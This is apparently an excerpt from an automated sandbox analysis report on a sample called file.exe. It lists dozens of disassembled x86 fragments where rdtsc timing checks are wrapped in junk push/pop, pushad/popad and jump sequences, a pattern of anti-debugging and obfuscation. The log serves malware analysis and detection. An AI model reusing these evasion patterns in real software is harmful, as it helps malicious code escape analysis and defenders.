          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87426E second address: 87428C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE1C8D96874h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87428C second address: 874296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE1C8D8FEB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874296 second address: 87429A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878FF9 second address: 87900A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FE1C8D8FEB6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87900A second address: 87900E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87AE20 second address: 87AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87AE27 second address: 87AEBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1C8D96873h 0x00000008 js 00007FE1C8D96866h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push esi 0x00000013 jl 00007FE1C8D9686Ch 0x00000019 pop esi 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FE1C8D96868h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub bh, 0000007Ah 0x00000038 push 00000000h 0x0000003a jmp 00007FE1C8D9686Bh 0x0000003f push 00000000h 0x00000041 jnl 00007FE1C8D9686Ah 0x00000047 mov bx, E575h 0x0000004b push eax 0x0000004c pushad 0x0000004d ja 00007FE1C8D9687Bh 0x00000053 push eax 0x00000054 push edx 0x00000055 js 00007FE1C8D96866h 0x0000005b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87AEBA second address: 87AEBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BF35 second address: 87BF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BF3B second address: 87BF4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FE1C8D8FEB6h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884310 second address: 884324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D96870h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883C0A second address: 883C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEC1h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888680 second address: 888691 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888691 second address: 888695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888695 second address: 8886BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FE1C8D96873h 0x0000000f jnl 00007FE1C8D9686Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886BA second address: 8886CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jnl 00007FE1C8D8FEC0h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888765 second address: 888769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888AC second address: 8888B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EF2C second address: 88EF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 js 00007FE1C8D96866h 0x0000000c pop esi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E16D second address: 88E185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FE1C8D8FEB6h 0x0000000a jmp 00007FE1C8D8FEBEh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E185 second address: 88E190 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E2F8 second address: 88E313 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007FE1C8D8FEB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007FE1C8D8FEC4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FE1C8D8FEB6h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E47C second address: 88E482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E482 second address: 88E488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E488 second address: 88E4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1C8D96874h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE1C8D96876h 0x00000013 jne 00007FE1C8D96876h 0x00000019 jmp 00007FE1C8D96870h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E4D1 second address: 88E4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE1C8D8FEB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E4DB second address: 88E4E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E640 second address: 88E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E646 second address: 88E64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E64A second address: 88E64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E64E second address: 88E656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E921 second address: 88E930 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE1C8D8FEB8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EA9A second address: 88EAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007FE1C8D96871h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EAB3 second address: 88EABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EABB second address: 88EAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EC2F second address: 88EC52 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE1C8D8FEB6h 0x00000008 jmp 00007FE1C8D8FEBEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 ja 00007FE1C8D8FED0h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EC52 second address: 88EC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE1C8D96866h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EDAC second address: 88EDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EDB1 second address: 88EDC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D9686Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EDC1 second address: 88EDC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8762B1 second address: 8762CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE1C8D96874h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8772A5 second address: 8772A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8772A9 second address: 87733C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FE1C8D96877h 0x00000010 popad 0x00000011 pop edi 0x00000012 nop 0x00000013 sub bh, 00000010h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d je 00007FE1C8D9686Eh 0x00000023 pushad 0x00000024 mov esi, dword ptr [ebp+122D2A31h] 0x0000002a popad 0x0000002b mov di, E507h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FE1C8D96868h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov ebx, 7ABF6308h 0x00000055 mov eax, dword ptr [ebp+122D1459h] 0x0000005b push esi 0x0000005c mov dword ptr [ebp+1246DC74h], esi 0x00000062 pop edi 0x00000063 push FFFFFFFFh 0x00000065 or dword ptr [ebp+122D36FDh], ecx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jng 00007FE1C8D9686Ch 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87733C second address: 877340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877340 second address: 877345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879139 second address: 87913D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87913D second address: 87914F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FE1C8D96868h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87914F second address: 879155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879155 second address: 879159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A10E second address: 87A122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8940BE second address: 8940D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE1C8D96866h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8940D4 second address: 8940D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8940D8 second address: 8940F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FE1C8D96877h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828C1A second address: 828C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894672 second address: 894690 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE1C8D96879h 0x00000008 jmp 00007FE1C8D96873h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894969 second address: 894973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE1C8D8FEB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894973 second address: 894990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96879h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894990 second address: 894999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894999 second address: 89499F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894AC8 second address: 894ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89884B second address: 89884F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814EB1 second address: 814EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861227 second address: 86122B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8612DC second address: 8612E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8612E3 second address: 8612E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8612E9 second address: 8612ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86165B second address: 861676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861676 second address: 86167A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86167A second address: 861680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86188E second address: 861892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861C29 second address: 861C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FE1C8D96875h 0x00000012 push 0000001Eh 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FE1C8D96868h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub edx, dword ptr [ebp+122D38B2h] 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861C7D second address: 861C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEC1h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861E18 second address: 861E1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861F84 second address: 861FAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FE1C8D8FEC8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnl 00007FE1C8D8FEB6h 0x00000017 pop esi 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861FAF second address: 862004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e jo 00007FE1C8D96868h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 je 00007FE1C8D9687Eh 0x0000001f jmp 00007FE1C8D96878h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ecx 0x00000029 pushad 0x0000002a jmp 00007FE1C8D96870h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862133 second address: 846C80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FE1C8D8FEBAh 0x0000000f nop 0x00000010 and edi, dword ptr [ebp+122D2909h] 0x00000016 call dword ptr [ebp+12448CD6h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FE1C8D8FEC9h 0x00000024 jnp 00007FE1C8D8FEB6h 0x0000002a jmp 00007FE1C8D8FEBFh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C80 second address: 846C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C8A second address: 846C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EF3D second address: 89EF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F673 second address: 89F677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F677 second address: 89F67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4038 second address: 8A404E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC0h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A404E second address: 8A4060 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE1C8D9686Ch 0x00000008 ja 00007FE1C8D96866h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4060 second address: 8A4070 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A44D1 second address: 8A44FA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE1C8D96868h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1C8D96877h 0x00000011 jg 00007FE1C8D96866h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4B25 second address: 8A4B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5483 second address: 8A548A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3D06 second address: 8A3D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FE1C8D8FEBFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3D23 second address: 8A3D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3D28 second address: 8A3D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3D30 second address: 8A3D3A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE1C8D96866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7ABE second address: 8A7AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D8FEBCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7AD0 second address: 8A7AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
